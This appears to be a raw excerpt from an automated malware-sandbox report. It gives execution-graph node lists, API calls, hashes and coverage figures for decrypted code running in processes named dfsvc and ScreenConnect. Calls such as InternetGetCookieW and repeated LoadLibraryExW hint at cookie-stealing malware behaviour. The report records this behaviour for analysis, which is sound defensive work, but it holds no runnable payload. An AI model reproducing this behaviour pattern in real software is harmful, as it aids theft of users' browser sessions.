51301->51297 51302 7ffaac4a7473 51302->51301 51307 7ffaac47a778 51302->51307 51304->51302 51306 7ffaac4a7515 51304->51306 51311 7ffaac472ef8 LoadLibraryExW 51304->51311 51309 7ffaac4a7640 51307->51309 51308 7ffaac4a76bc 51308->51302 51309->51308 51310 7ffaac474c90 LoadLibraryExW 51309->51310 51310->51308 51311->51302 50921 7ffaac4a8dd6 50922 7ffaac4a8de3 50921->50922 50923 7ffaac487700 LoadLibraryExW 50922->50923 50924 7ffaac4a8ec4 50922->50924 50923->50924 50925 7ffaac4773d0 LoadLibraryExW 50924->50925 50926 7ffaac4a8f30 50925->50926 50927 7ffaac4a8f44 50926->50927 50928 7ffaac487700 LoadLibraryExW 50926->50928 50929 7ffaac487700 LoadLibraryExW 50927->50929 50930 7ffaac4a8f75 50927->50930 50928->50927 50929->50930 50931 7ffaac487700 LoadLibraryExW 50930->50931 50932 7ffaac4a8fc6 50930->50932 50931->50932 50933 7ffaac474c90 LoadLibraryExW 50932->50933 50934 7ffaac4a9010 50933->50934 50935 7ffaac474c90 LoadLibraryExW 50934->50935 50936 7ffaac4a9043 50935->50936 50937 7ffaac474c90 LoadLibraryExW 50936->50937 50938 7ffaac4a9073 50936->50938 50937->50938 51010 7ffaac4bfd96 51012 7ffaac4bfdd5 51010->51012 51011 7ffaac4c0337 51012->51011 51013 7ffaac487700 LoadLibraryExW 51012->51013 51013->51012 50714 7ffaac47bf19 50715 7ffaac47bf2f 50714->50715 50716 7ffaac47c086 50715->50716 50718 7ffaac474c90 LoadLibraryExW 50715->50718 50719 7ffaac47c12e 50716->50719 50722 7ffaac47a728 50716->50722 50720 7ffaac47bfe6 50718->50720 50721 7ffaac474c90 LoadLibraryExW 50720->50721 50721->50716 50723 7ffaac47c710 50722->50723 50732 7ffaac4773d0 50723->50732 50725 7ffaac47c74b 50726 7ffaac474c90 LoadLibraryExW 50725->50726 50727 7ffaac47c7a3 50726->50727 50737 7ffaac47a720 50727->50737 50729 7ffaac47c7c2 50729->50716 50730 7ffaac47c7b4 50730->50729 50731 7ffaac474c90 LoadLibraryExW 50730->50731 50731->50729 50733 7ffaac4773ff 50732->50733 50734 7ffaac4773f6 50732->50734 50735 7ffaac473f30 LoadLibraryExW 50733->50735 50734->50725 50736 7ffaac477404 50735->50736 50736->50725 50738 7ffaac47d350 50737->50738 50739 7ffaac47d3cc 50738->50739 50740 7ffaac47d460 50738->50740 50742 7ffaac474c90 LoadLibraryExW 50739->50742 50741 7ffaac474c90 LoadLibraryExW 50740->50741 50745 7ffaac47d449 50741->50745 50742->50745 50743 7ffaac47d62c 50743->50730 50744 7ffaac47d5db 50746 7ffaac474c90 LoadLibraryExW 50744->50746 50745->50743 50745->50744 50747 7ffaac474c90 LoadLibraryExW 50745->50747 50746->50743 50747->50744 51014 7ffaac4c0d8d 51015 7ffaac4c0daf 51014->51015 51016 7ffaac4c0f59 51015->51016 51019 7ffaac4c0def 51015->51019 51017 7ffaac487700 LoadLibraryExW 51016->51017 51024 7ffaac4c0f12 51016->51024 51017->51024 51018 7ffaac487700 LoadLibraryExW 51020 7ffaac4c0e88 51018->51020 51019->51018 51019->51020 51021 7ffaac487700 LoadLibraryExW 51020->51021 51023 7ffaac4c0ee1 51020->51023 51020->51024 51021->51023 51022 7ffaac487700 LoadLibraryExW 51022->51024 51023->51022 51023->51024 50939 7ffaac47a0d5 50940 7ffaac47a0ff 50939->50940 50941 7ffaac4773d0 LoadLibraryExW 50940->50941 50942 7ffaac47a11a 50940->50942 50943 7ffaac47a23a 50941->50943 50944 7ffaac4742d5 50946 7ffaac4742ef 50944->50946 50945 7ffaac4743f2 50946->50945 50948 7ffaac472ef8 LoadLibraryExW 50946->50948 50948->50945 51312 7ffaac4ac551 51313 7ffaac4ac55f 51312->51313 51314 7ffaac4773d0 LoadLibraryExW 51313->51314 51316 7ffaac4ac5c6 51314->51316 51315 7ffaac4ac891 51316->51315 51319 7ffaac472ef8 LoadLibraryExW 51316->51319 51318 7ffaac4ac87e 51319->51318 50748 7ffaac481612 50751 7ffaac48163f InternetGetCookieW 50748->50751 50750 7ffaac481809 50751->50750 50752 7ffaac4bf205 50753 7ffaac4bf223 50752->50753 50754 7ffaac474c90 LoadLibraryExW 50753->50754 50755 7ffaac4bf298 50753->50755 50754->50755 51025 7ffaac4c3785 51027 7ffaac4c3793 51025->51027 51028 7ffaac4c3860 51027->51028 51029 7ffaac4be900 51027->51029 51030 7ffaac4be905 51029->51030 51031 7ffaac4773d0 LoadLibraryExW 51030->51031 51032 7ffaac4be982 51031->51032 51033 7ffaac478fd0 LoadLibraryExW 51032->51033 51034 7ffaac4be9a6 51033->51034 51035 7ffaac4be9f2 51034->51035 51036 7ffaac474c90 LoadLibraryExW 51034->51036 51037 7ffaac474c90 LoadLibraryExW 51035->51037 51042 7ffaac4bea49 51035->51042 51038 7ffaac4be9ce 51036->51038 51037->51042 51058 7ffaac4a2520 51038->51058 51040 7ffaac4beb41 51041 7ffaac487700 LoadLibraryExW 51040->51041 51044 7ffaac4beb60 51040->51044 51041->51044 51042->51040 51043 7ffaac474c90 LoadLibraryExW 51042->51043 51043->51040 51047 7ffaac474c90 LoadLibraryExW 51044->51047 51054 7ffaac4befc5 51044->51054 51045 7ffaac4bf091 51048 7ffaac487700 LoadLibraryExW 51045->51048 51050 7ffaac4bf0cb 51045->51050 51046 7ffaac487700 LoadLibraryExW 51046->51045 51049 7ffaac4bec24 51047->51049 51048->51050 51051 7ffaac487700 LoadLibraryExW 51049->51051 51052 7ffaac4bec41 51049->51052 51050->51027 51051->51052 51053 7ffaac474c90 LoadLibraryExW 51052->51053 51057 7ffaac4becdb 51053->51057 51054->51045 51054->51046 51054->51050 51055 7ffaac487700 LoadLibraryExW 51055->51057 51056 7ffaac474c90 LoadLibraryExW 51056->51057 51057->51054 51057->51055 51057->51056 51059 7ffaac4a2534 51058->51059 51061 7ffaac4a2542 51058->51061 51060 7ffaac487700 LoadLibraryExW 51059->51060 51060->51061 51061->51035 51062 7ffaac47527d 51065 7ffaac47528b 51062->51065 51064 7ffaac4752f3 51065->51064 51067 7ffaac472ef8 LoadLibraryExW 51065->51067 51066 7ffaac4752e8 51067->51066 50949 7ffaac4acbbd 50950 7ffaac4acbc3 50949->50950 50953 7ffaac4715f8 50950->50953 50952 7ffaac4acc6b 50954 7ffaac471601 50953->50954 50955 7ffaac471802 LoadLibraryExW 50954->50955 50957 7ffaac471683 50954->50957 50956 7ffaac471836 50955->50956 50956->50952 50957->50952 50756 7ffaac4a32fd 50757 7ffaac4a3305 50756->50757 50758 7ffaac4a337a 50757->50758 50759 7ffaac4a3564 50757->50759 50760 7ffaac4773d0 LoadLibraryExW 50758->50760 50762 7ffaac474c90 LoadLibraryExW 50759->50762 50761 7ffaac4a33ef 50760->50761 50776 7ffaac47b540 50761->50776 50767 7ffaac4a35fc 50762->50767 50764 7ffaac4a340a 50780 7ffaac488a10 50764->50780 50766 7ffaac4a3417 50766->50767 50768 7ffaac4a3453 50766->50768 50769 7ffaac474c90 LoadLibraryExW 50767->50769 50770 7ffaac4a34b6 50768->50770 50773 7ffaac4a36de 50768->50773 50769->50773 50771 7ffaac474c90 LoadLibraryExW 50770->50771 50772 7ffaac4a34f4 50770->50772 50771->50772 50775 7ffaac4a3fcb 50773->50775 50801 7ffaac476178 50773->50801 50777 7ffaac47b565 50776->50777 50778 7ffaac4773d0 LoadLibraryExW 50777->50778 50779 7ffaac47b57a 50778->50779 50779->50764 50781 7ffaac488a3d 50780->50781 50782 7ffaac4773d0 LoadLibraryExW 50781->50782 50783 7ffaac488a82 50782->50783 50797 7ffaac488c6c 50783->50797 50805 7ffaac4730b8 50783->50805 50785 7ffaac488b19 50786 7ffaac474c90 LoadLibraryExW 50785->50786 50787 7ffaac488b86 50786->50787 50788 7ffaac474c90 LoadLibraryExW 50787->50788 50789 7ffaac488bc2 50788->50789 50810 7ffaac4730c0 50789->50810 50791 7ffaac488bc7 50792 7ffaac474c90 LoadLibraryExW 50791->50792 50793 7ffaac488c02 50792->50793 50815 7ffaac4730b0 50793->50815 50795 7ffaac488c07 50796 7ffaac488c23 50795->50796 50820 7ffaac476128 50795->50820 50799 7ffaac474c90 LoadLibraryExW 50796->50799 50797->50766 50800 7ffaac488c3d 50799->50800 50800->50766 50802 7ffaac4a5ad0 50801->50802 50804 7ffaac4a5ae4 50802->50804 50831 7ffaac48ecb0 50802->50831 50804->50773 50807 7ffaac488ff0 50805->50807 50806 7ffaac489043 50806->50785 50807->50806 50827 7ffaac472ef8 LoadLibraryExW 50807->50827 50809 7ffaac489038 50809->50785 50812 7ffaac489d20 50810->50812 50811 7ffaac489d73 50811->50791 50812->50811 50828 7ffaac472ef8 LoadLibraryExW 50812->50828 50814 7ffaac489d68 50814->50791 50816 7ffaac490ab0 50815->50816 50817 7ffaac490b03 50816->50817 50829 7ffaac472ef8 LoadLibraryExW 50816->50829 50817->50795 50819 7ffaac490af8 50819->50795 50821 7ffaac490f30 50820->50821 50826 7ffaac491031 50821->50826 50830 7ffaac472ef8 LoadLibraryExW 50821->50830 50823 7ffaac491003 50824 7ffaac474c90 LoadLibraryExW 50823->50824 50825 7ffaac49101d 50824->50825 50825->50796 50826->50796 50827->50809 50828->50814 50829->50819 50830->50823 50833 7ffaac48ecd7 50831->50833 50832 7ffaac48ee14 50832->50804 50833->50832 50834 7ffaac474c90 LoadLibraryExW 50833->50834 50835 7ffaac48f00f 50834->50835 50958 7ffaac4bd5ba 50959 7ffaac4bd5cb 50958->50959 50962 7ffaac4ba4f0 50959->50962 50961 7ffaac4bd610 50964 7ffaac4ba4f5 50962->50964 50963 7ffaac4ba4e2 50963->50961 50964->50963 50965 7ffaac4773d0 LoadLibraryExW 50964->50965 50966 7ffaac4ba59a 50965->50966 50967 7ffaac4ba63d 50966->50967 50970 7ffaac4ba686 50966->50970 50968 7ffaac474c90 LoadLibraryExW 50967->50968 50969 7ffaac4ba677 50968->50969 50969->50961 50972 7ffaac4ba6f3 50970->50972 50975 7ffaac476158 LoadLibraryExW 50970->50975 50976 7ffaac472f78 LoadLibraryExW 50972->50976 50974 7ffaac4ba74f 50974->50961 50975->50972 50976->50974 50836 7ffaac4c2101 50839 7ffaac4c210f 50836->50839 50837 7ffaac4c239a 50840 7ffaac4c21b0 50839->50840 50841 7ffaac4c23b8 50839->50841 50840->50837 50844 7ffaac476a48 50840->50844 50843 7ffaac4c24f5 50841->50843 50848 7ffaac4be890 50841->50848 50845 7ffaac4c2420 50844->50845 50846 7ffaac4be890 LoadLibraryExW 50845->50846 50847 7ffaac4c24f5 50845->50847 50846->50845 50847->50840 50849 7ffaac4c26d0 50848->50849 50851 7ffaac4c2709 50849->50851 50854 7ffaac4853d0 50849->50854 50851->50841 50852 7ffaac4c278f 50857 7ffaac4be8b0 50852->50857 50855 7ffaac477de0 LoadLibraryExW 50854->50855 50856 7ffaac4853e3 50854->50856 50855->50856 50856->50852 50859 7ffaac4c3140 50857->50859 50858 7ffaac4c338c 50858->50851 50859->50858 50860 7ffaac4853d0 LoadLibraryExW 50859->50860 50860->50859 51068 7ffaac4a2581 51069 7ffaac4a258b 51068->51069 51070 7ffaac4773d0 LoadLibraryExW 51069->51070 51071 7ffaac4a25f6 51070->51071 51072 7ffaac474c90 LoadLibraryExW 51071->51072 51073 7ffaac4a263e 51072->51073 51074 7ffaac4a2ee4 51073->51074 51075 7ffaac475990 LoadLibraryExW 51073->51075 51076 7ffaac4a273b 51075->51076 51077 7ffaac474c90 LoadLibraryExW 51076->51077 51078 7ffaac4a2755 51077->51078 51079 7ffaac474c90 LoadLibraryExW 51078->51079 51080 7ffaac4a2831 51079->51080 51080->51074 51081 7ffaac4a284d 51080->51081 51082 7ffaac4a288d 51080->51082 51084 7ffaac474c90 LoadLibraryExW 51081->51084 51082->51074 51083 7ffaac487700 LoadLibraryExW 51082->51083 51085 7ffaac4a28c0 51082->51085 51083->51085 51090 7ffaac4a2867 51084->51090 51085->51090 51106 7ffaac4733d8 51085->51106 51087 7ffaac4a28f5 51088 7ffaac4733d8 LoadLibraryExW 51087->51088 51087->51090 51089 7ffaac4a2943 51088->51089 51091 7ffaac474c90 LoadLibraryExW 51089->51091 51092 7ffaac474c90 LoadLibraryExW 51090->51092 51093 7ffaac4a296b 51091->51093 51097 7ffaac4a2a53 51092->51097 51094 7ffaac474c90 LoadLibraryExW 51093->51094 51095 7ffaac4a2985 51094->51095 51095->51090 51096 7ffaac487700 LoadLibraryExW 51095->51096 51096->51090 51097->51074 51098 7ffaac475990 LoadLibraryExW 51097->51098 51099 7ffaac4a2ab7 51098->51099 51100 7ffaac474c90 LoadLibraryExW 51099->51100 51101 7ffaac4a2ad1 51100->51101 51102 7ffaac474c90 LoadLibraryExW 51101->51102 51104 7ffaac4a2aeb 51102->51104 51103 7ffaac4a2ea6 51104->51103 51105 7ffaac475990 LoadLibraryExW 51104->51105 51105->51103 51110 7ffaac4733dd 51106->51110 51107 7ffaac473774 51132 7ffaac473c81 51107->51132 51109 7ffaac47378e 51109->51087 51110->51107 51118 7ffaac472f18 51110->51118 51112 7ffaac4734b6 51123 7ffaac472f68 51112->51123 51114 7ffaac4734cb 51114->51107 51128 7ffaac472f80 51114->51128 51116 7ffaac47370a 51117 7ffaac472f80 LoadLibraryExW 51116->51117 51117->51107 51119 7ffaac472f1d 51118->51119 51120 7ffaac472f5a 51119->51120 51121 7ffaac472f00 LoadLibraryExW 51119->51121 51120->51112 51122 7ffaac475929 51121->51122 51122->51112 51124 7ffaac472f6d 51123->51124 51125 7ffaac472f84 51124->51125 51126 7ffaac472f00 LoadLibraryExW 51124->51126 51125->51114 51127 7ffaac475929 51126->51127 51127->51114 51129 7ffaac4758a0 51128->51129 51130 7ffaac472f00 LoadLibraryExW 51129->51130 51131 7ffaac475929 51130->51131 51131->51116 51133 7ffaac473cae 51132->51133 51134 7ffaac472e48 LoadLibraryExW 51133->51134 51135 7ffaac473d19 51134->51135 51135->51109 51320 7ffaac4b6375 51321 7ffaac4b6384 51320->51321 51324 7ffaac4b5f50 51321->51324 51323 7ffaac4b6399 51327 7ffaac4b7b40 51324->51327 51325 7ffaac4853d0 LoadLibraryExW 51326 7ffaac4b7c35 51325->51326 51328 7ffaac477de0 LoadLibraryExW 51326->51328 51327->51325 51329 7ffaac4b7c47 51328->51329 51330 7ffaac474c90 LoadLibraryExW 51329->51330 51331 7ffaac4b7c80 51330->51331 51331->51323 50981 7ffaac4799eb 50982 7ffaac4799f7 CreateFileW 50981->50982 50984 7ffaac479b2c 50982->50984 50985 7ffaac4b9fed 50986 7ffaac4ba00f 50985->50986 50987 7ffaac474c90 LoadLibraryExW 50986->50987 50988 7ffaac4ba03a 50986->50988 50987->50988 50861 7ffaac4b302d 50863 7ffaac4b3032 50861->50863 50862 7ffaac4b3194 50863->50862 50864 7ffaac474c90 LoadLibraryExW 50863->50864 50865 7ffaac4b318b 50864->50865 51136 7ffaac4b04ad 51137 7ffaac4b04cf 51136->51137 51138 7ffaac4773d0 LoadLibraryExW 51137->51138 51139 7ffaac4b051e 51138->51139 51140 7ffaac474c90 LoadLibraryExW 51139->51140 51141 7ffaac4b0548 51140->51141 51142 7ffaac474c90 LoadLibraryExW 51141->51142 51143 7ffaac4b0572 51142->51143 51144 7ffaac474c90 LoadLibraryExW 51143->51144 51145 7ffaac4b059c 51144->51145 51146 7ffaac474c90 LoadLibraryExW 51145->51146 51147 7ffaac4b05c6 51146->51147 51332 7ffaac4a806a 51333 7ffaac4a806f 51332->51333 51334 7ffaac4773d0 LoadLibraryExW 51333->51334 51335 7ffaac4a80b0 51334->51335 51336 7ffaac474c90 LoadLibraryExW 51335->51336 51337 7ffaac4a819c 51335->51337 51338 7ffaac4a813d 51336->51338 51339 7ffaac474c90 LoadLibraryExW 51338->51339 51339->51337 50866 7ffaac473d36 50867 7ffaac473d3d 50866->50867 50872 7ffaac472e48 50867->50872 50869 7ffaac473e2a 50878 7ffaac472e20 50869->50878 50873 7ffaac473e70 50872->50873 50885 7ffaac472e08 50873->50885 50875 7ffaac473ec9 50875->50869 50876 7ffaac473e8a 50876->50875 50889 7ffaac472e30 50876->50889 50880 7ffaac472e25 50878->50880 50879 7ffaac472e59 50880->50879 50881 7ffaac472e08 LoadLibraryExW 50880->50881 50883 7ffaac473e8a 50881->50883 50882 7ffaac473e4c 50883->50882 50884 7ffaac472e30 LoadLibraryExW 50883->50884 50884->50882 50886 7ffaac473f30 50885->50886 50887 7ffaac4715c8 LoadLibraryExW 50886->50887 50888 7ffaac473f55 50887->50888 50888->50876 50891 7ffaac472e35 50889->50891 50890 7ffaac472e59 50891->50890 50892 7ffaac472e08 LoadLibraryExW 50891->50892 50894 7ffaac473e8a 50892->50894 50893 7ffaac473ec9 50893->50875 50894->50893 50895 7ffaac472e30 LoadLibraryExW 50894->50895 50895->50893 50896 7ffaac4c362a 50898 7ffaac4c3637 50896->50898 50897 7ffaac4c3689 50900 7ffaac4c36c6 50897->50900 50901 7ffaac487700 LoadLibraryExW 50897->50901 50903 7ffaac4c36fe 50897->50903 50898->50897 50898->50903 50904 7ffaac487700 50898->50904 50902 7ffaac487700 LoadLibraryExW 50900->50902 50900->50903 50901->50900 50902->50903 50905 7ffaac487728 50904->50905 50910 7ffaac478fd0 50905->50910 50907 7ffaac487736 50908 7ffaac476978 LoadLibraryExW 50907->50908 50909 7ffaac487749 50908->50909 50909->50897 50911 7ffaac477de0 LoadLibraryExW 50910->50911 50912 7ffaac478fe7 50910->50912 50911->50912 51148 7ffaac48a1af 51149 7ffaac48a1c3 51148->51149 51154 7ffaac476160 51149->51154 51151 7ffaac48a557 51152 7ffaac48a1cb 51152->51151 51158 7ffaac476170 51152->51158 51155 7ffaac476165 51154->51155 51156 7ffaac48ecb0 LoadLibraryExW 51155->51156 51157 7ffaac4761b9 51155->51157 51156->51157 51157->51152 51159 7ffaac476175 51158->51159 51160 7ffaac48ecb0 LoadLibraryExW 51159->51160 51161 7ffaac4a5ae4 51159->51161 51160->51161 51161->51151 51340 7ffaac474b75 51341 7ffaac474b7f 51340->51341 51342 7ffaac473f30 LoadLibraryExW 51341->51342 51343 7ffaac474bad 51342->51343 50989 7ffaac4a16e2 50990 7ffaac4a16ea 50989->50990 50991 7ffaac4a170b 50989->50991 50990->50991 50992 7ffaac4a176c 50990->50992 50993 7ffaac474c90 LoadLibraryExW 50991->50993 50995 7ffaac474c90 LoadLibraryExW 50992->50995 50999 7ffaac4a1761 50993->50999 50994 7ffaac4a1b30 51001 7ffaac4a17c2 50995->51001 50996 7ffaac4a1af4 50996->50994 50997 7ffaac474c90 LoadLibraryExW 50996->50997 50997->50994 50998 7ffaac4a1b44 50999->50996 51000 7ffaac474c90 LoadLibraryExW 50999->51000 51005 7ffaac4a19ae 51000->51005 51001->50998 51001->50999 51002 7ffaac474c90 LoadLibraryExW 51001->51002 51003 7ffaac4a18b7 51002->51003 51003->50999 51004 7ffaac474c90 LoadLibraryExW 51003->51004 51004->50999 51005->50996 51005->50998 51006 7ffaac474c90 LoadLibraryExW 51005->51006 51006->50996 51162 7ffaac4b15a5 51164 7ffaac4b15bf 51162->51164 51163 7ffaac4b15e0 51164->51163 51167 7ffaac4b16f2 51164->51167 51169 7ffaac4a6fc0 51164->51169 51166 7ffaac4b1754 51167->51166 51172 7ffaac4b1e57 LoadLibraryExW 51167->51172 51170 7ffaac477de0 LoadLibraryExW 51169->51170 51171 7ffaac4a6fd5 51169->51171 51170->51171 51171->51167 51172->51166 50913 7ffaac48e725 50914 7ffaac48e72f 50913->50914 50917 7ffaac476168 50914->50917 50916 7ffaac48e764 50918 7ffaac47616d 50917->50918 50919 7ffaac48ecb0 LoadLibraryExW 50918->50919 50920 7ffaac4a5ae4 50918->50920 50919->50920 50920->50916 51177 7ffaac4c3d9d 51178 7ffaac4c3da7 51177->51178 51179 7ffaac474c90 LoadLibraryExW 51178->51179 51180 7ffaac4c3e60 51179->51180 51181 7ffaac474c90 LoadLibraryExW 51180->51181 51182 7ffaac4c3e97 51181->51182 51183 7ffaac474c90 LoadLibraryExW 51182->51183 51184 7ffaac4c3ecf 51183->51184 51185 7ffaac487700 LoadLibraryExW 51184->51185 51186 7ffaac4c3f16 51184->51186 51185->51186 51187 7ffaac487700 LoadLibraryExW 51186->51187 51188 7ffaac4c3fab 51186->51188 51187->51188 51189 7ffaac487700 LoadLibraryExW 51188->51189 51190 7ffaac4c402b 51188->51190 51189->51190 51191 7ffaac487700 LoadLibraryExW 51190->51191 51192 7ffaac4c40ab 51190->51192 51191->51192 51193 7ffaac487700 LoadLibraryExW 51192->51193 51194 7ffaac4c412b 51192->51194 51193->51194 51195 7ffaac487700 LoadLibraryExW 51194->51195 51196 7ffaac4c41ab 51194->51196 51195->51196 51197 7ffaac487700 LoadLibraryExW 51196->51197 51198 7ffaac4c422b 51196->51198 51197->51198 51199 7ffaac487700 LoadLibraryExW 51198->51199 51200 7ffaac4c42c4 51198->51200 51199->51200 51201 7ffaac487700 LoadLibraryExW 51200->51201 51202 7ffaac4c435d 51200->51202 51201->51202 51203 7ffaac487700 LoadLibraryExW 51202->51203 51205 7ffaac4c43f6 51202->51205 51203->51205 51204 7ffaac487700 LoadLibraryExW 51206 7ffaac4c44a8 51204->51206 51205->51204 51205->51206 51207 7ffaac487700 LoadLibraryExW 51206->51207 51209 7ffaac4c4541 51206->51209 51207->51209 51208 7ffaac487700 LoadLibraryExW 51208->51209 51209->51208 51210 7ffaac4c4701 51209->51210 51211 7ffaac4795a5 51213 7ffaac4795bf 51211->51213 51212 7ffaac4795e8 51213->51212 51216 7ffaac471518 51213->51216 51215 7ffaac479670 51217 7ffaac471521 51216->51217 51218 7ffaac471802 LoadLibraryExW 51217->51218 51220 7ffaac471683 51217->51220 51219 7ffaac471836 51218->51219 51219->51215 51220->51215 51344 7ffaac4ba761 51345 7ffaac4ba784 51344->51345 51346 7ffaac4ba732 51345->51346 51350 7ffaac4ba79e 51345->51350 51354 7ffaac472f78 LoadLibraryExW 51346->51354 51348 7ffaac4ba74f 51349 7ffaac4ba7d1 51356 7ffaac472f78 LoadLibraryExW 51349->51356 51350->51349 51355 7ffaac476158 LoadLibraryExW 51350->51355 51353 7ffaac4ba875 51354->51348 51355->51349 51356->51353
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3179309726.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac470000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 2N_I
                                                                                                                                                                                                                                                                    • API String ID: 0-859961171
                                                                                                                                                                                                                                                                    • Opcode ID: 6ecca39084fdeb0db7d1783318b8ac2138390ff48732240d2477755e6be67f45
                                                                                                                                                                                                                                                                    • Instruction ID: 76d15595e2b2befb02cc41f9601fe0995d596c3197ac67bab95df182bed72378
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ecca39084fdeb0db7d1783318b8ac2138390ff48732240d2477755e6be67f45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DC134A2E0EBD58FF74997A8581D2796FE1EF52314B0881BAD04EC7197ED28D80983C5
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3179309726.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac470000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookieInternet
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 930238652-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3573defc85e36c70e32be05f1d335bd587f4f875884aed76b9300ccc75b41e88
                                                                                                                                                                                                                                                                    • Instruction ID: 3c29d8e6e560082752a682e36087b7409881dcde8602c81f0e941640b266969d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3573defc85e36c70e32be05f1d335bd587f4f875884aed76b9300ccc75b41e88
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3191D230509A8D8FEB69DF28C8597F53BE1FF59311F04826FD84EC7292CA74A9458B81
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3179309726.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac470000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6cf2ba8167380e1db1d1b6297ec42cf490535f433c7a5e6d7fbb103eaec53ce4
                                                                                                                                                                                                                                                                    • Instruction ID: c166993cd3aa7bb993b39db269243d693abf78ea00fdd3b334f2880935d91140
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cf2ba8167380e1db1d1b6297ec42cf490535f433c7a5e6d7fbb103eaec53ce4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8051917191CA5C8FDB68EF58D845BE9BBE0FB69310F1481AEE04DD3252CB34A945CB81
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.3178810746.00007FFAAC35D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC35D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffaac35d000_dfsvc.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 837f0bcc348962f7761fc8a4dc500f131d0a1c5ddb690ea9b3fcd420d4fdb504
                                                                                                                                                                                                                                                                    • Instruction ID: 11df4f20aebd56ef31d3005180746197e6a8ed9f6c1770d5197e87f36845615d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837f0bcc348962f7761fc8a4dc500f131d0a1c5ddb690ea9b3fcd420d4fdb504
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0141287180DBC48FE356CB2898459527FF0EF47320B1541EFD088CB1A7DA29E84AC7A2

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:13.5%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                    Total number of Nodes:12
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                    execution_graph 10675 7ffaac454890 10676 7ffaac454899 GetTokenInformation 10675->10676 10678 7ffaac46f2d7 10676->10678 10679 7ffaac453dfa 10680 7ffaac46f470 CloseHandle 10679->10680 10682 7ffaac46f4eb 10680->10682 10683 7ffaac45f67b 10684 7ffaac45f687 CreateFileW 10683->10684 10686 7ffaac45f7bc 10684->10686 10687 7ffaac4584b8 10688 7ffaac4584bf SetProcessMitigationPolicy 10687->10688 10690 7ffaac458552 10688->10690

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 252 7ffaac454890-7ffaac4548d9 258 7ffaac4548dc 252->258 258->258 259 7ffaac4548de-7ffaac454949 258->259 267 7ffaac45494c 259->267 267->267 268 7ffaac45494e-7ffaac46f2d5 GetTokenInformation 267->268 274 7ffaac46f2dd-7ffaac46f30e 268->274 275 7ffaac46f2d7 268->275 275->274
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1571407783.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffaac450000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4757e2f96637380675e55542bd1a267824a85f485e5e62f19f22bf15a63028ad
                                                                                                                                                                                                                                                                    • Instruction ID: 185a8f631554f064d2370c9e20ff274ec76e80c367e218cef337835451b53f1d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4757e2f96637380675e55542bd1a267824a85f485e5e62f19f22bf15a63028ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B6127B291EBC48FE719879C581A2B87FE0EB96314F0441BFE04D8729BC924DC0983D6

